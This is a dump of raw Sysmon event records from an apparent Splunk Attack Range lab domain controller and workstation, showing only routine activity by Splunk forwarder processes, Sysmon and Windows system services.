11:17:59.322{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F081AEB9D131AFF16410EF3B22F7FB5,SHA256=26CC7E64B1D3766D72664A9DD0F00A2072CC7D2C580009B13FBC763C1BE61ECA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221625Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:59.264{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1AFF93BDADC1CB84482F794F2969A2B,SHA256=5E7BC1BA27AB296F79AFC9EF411BB7BB726A9AD7EC959C0046AB9B4B02772892,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221626Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:00.342{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F311A290FA1E1645706F330FFC4FF8D,SHA256=A487F7DD8BD1EFB6D36F9DCD40BA346CDD1B23DD0678C1413309F33C8B21881F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297718Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:00.341{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7E7E9541C2A99B73EA630B1B69D9A46,SHA256=E40FFFA7E73D874F07EE6A7A9F5DC1874006BE59CEC2E9177D4C185CFA87FA0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221627Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:01.389{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1A802D31B2421D0D8CA4A23FC864201,SHA256=80E1E675A4A2A9B2053D33EA3B71DC709F1A3856F9DE876E28C47CAAD9EAD18E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297727Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:01.444{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-17E9-6216-3707-000000003802}704C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297726Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:01.444{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-17E9-6216-3707-000000003802}704C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297725Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:01.444{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297724Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:01.443{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297723Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:01.443{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297722Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:01.443{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297721Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:01.441{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-17E9-6216-3707-000000003802}704C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000297720Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:01.439{C8EA50B7-17E9-6216-3707-000000003802}704C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000297719Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:01.359{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4569F6147A3C39F111FB48313867DDD7,SHA256=24E3AEF49A2943BB9115111BBBD3C5C9CB0E6B3931656708538A73D47916C072,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221628Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:02.608{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60085718001D4F5B7D749A908006B64E,SHA256=B27145DE19FA69DAD1A5121F0E7FE69D5C79EB584A030D8123350FA35F5C3857,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297738Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:00.715{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49475-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000297737Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:02.677{C8EA50B7-17EA-6216-3807-000000003802}70083152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000297736Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:02.369{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E65E784AD6BB31DECB75162B5A05BBDA,SHA256=12528439A82CCDB87F8E63EAE0D0618BAFFD7400584BD323D7B53AA360B81EF9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297735Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:02.316{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-17EA-6216-3807-000000003802}7008C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297734Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:02.316{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297733Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:02.316{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297732Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:02.316{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297731Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:02.316{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297730Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:02.316{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-17EA-6216-3807-000000003802}7008C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297729Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:02.316{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-17EA-6216-3807-000000003802}7008C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000297728Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:02.318{C8EA50B7-17EA-6216-3807-000000003802}7008C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000297747Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:03.730{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-17EB-6216-3907-000000003802}6952C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297746Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:03.714{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297745Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:03.714{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297744Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:03.714{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297743Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:03.714{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297742Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:03.714{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-17EB-6216-3907-000000003802}6952C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297741Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 